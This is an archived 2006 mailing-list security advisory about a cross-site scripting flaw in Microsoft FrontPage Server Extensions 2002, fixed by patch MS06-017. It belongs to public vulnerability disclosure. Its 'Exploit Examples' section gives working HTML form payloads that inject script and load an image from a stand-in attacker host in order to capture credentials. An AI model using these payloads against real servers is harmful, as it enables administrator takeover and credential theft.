Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Vulnerability in Microsoft FrontPage Server Extensions Could

from [Esteban Martinez Fayo] Network Security [Permanent Link]
Subject: [VulnWatch] Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting
Date: Wed, 12 Apr 2006 18:36:08 -0300 
Argeniss Security Advisory


Name: Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting (MS06-17)
Affected Software: Microsoft FrontPage Server Extensions 2002 and Microsoft SharePoint Team Services
Severity: Medium
Remote exploitable: Yes (User intervention required)
Credits: Esteban Martínez Fayó
Date: 4/11/2006
Advisory Number: ARG040602


Details:
The FrontPage Server Extensions 2002 (included in Windows Sever 2003 IIS 6.0 and available as a separate download for Windows 2000 and XP) has a web page /_vti_bin/_vti_adm/fpadmdll.dll that is used for administrative purposes.
This web page is vulnerable to cross site scripting attacks allowing an attacker to run client-side script on behalf of an FPSE user. If the victim is an administrator, the attacker could take complete control of a Front Page Server Extensions 2002 server.

To exploit the vulnerability an attacker can send a specially crafted e-mail message to a FPSE user and then persuade the user to click a link in the e-mail message.
In addition, this vulnerability can be exploited if an attacker hosts a malicious website and persuade the user to visit it.

The vulnerable parameters of fpadmdll.dll are "operation", "command", and "name". These parameters appears in the output without properly sanitization in an HTML comment but it can be escaped with a '-->'.

Exploit Examples:

An attacker could create a FORM that POST to the FPSE server and executes a script on the client system.
<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

Also, an attacker could inject an image from another web site that he has control over and if it has HTTP authentication could convince the user to enter its credentials and capture it.
<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>


Vendor Status:
Vendor was contacted and a patch was released.


Patch Available:
Apply patch MS06-017.


Links:
http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx


Spam:
Argeniss Ultimate 0day Exploits Pack
http://www.argeniss.com/products.html



Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com

__________________________________________________
Correo Yahoo!
Espacio para todos tus mensajes, antivirus y antispam ¡gratis! ¡Abrí tu cuenta ya! - http://correo.yahoo.com.ar

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting, Esteban Martinez Fayo <=
Previous by Date:  [Full-disclosure] IMF 2006 - Submission Deadline Extension, Oliver Goebel
Next by Date:  [Full-disclosure] [Argeniss] Oracle Database 10gR1 Buffer overflow in VERIFY_LOG procedure, Cesar
Previous by Thread:  [Full-disclosure] IMF 2006 - Submission Deadline Extension, Oliver Goebel
Next by Thread:  [Full-disclosure] [Argeniss] Oracle Database 10gR1 Buffer overflow in VERIFY_LOG procedure, Cesar
Indexes:  [Date] [Thread] [Top] [All Lists]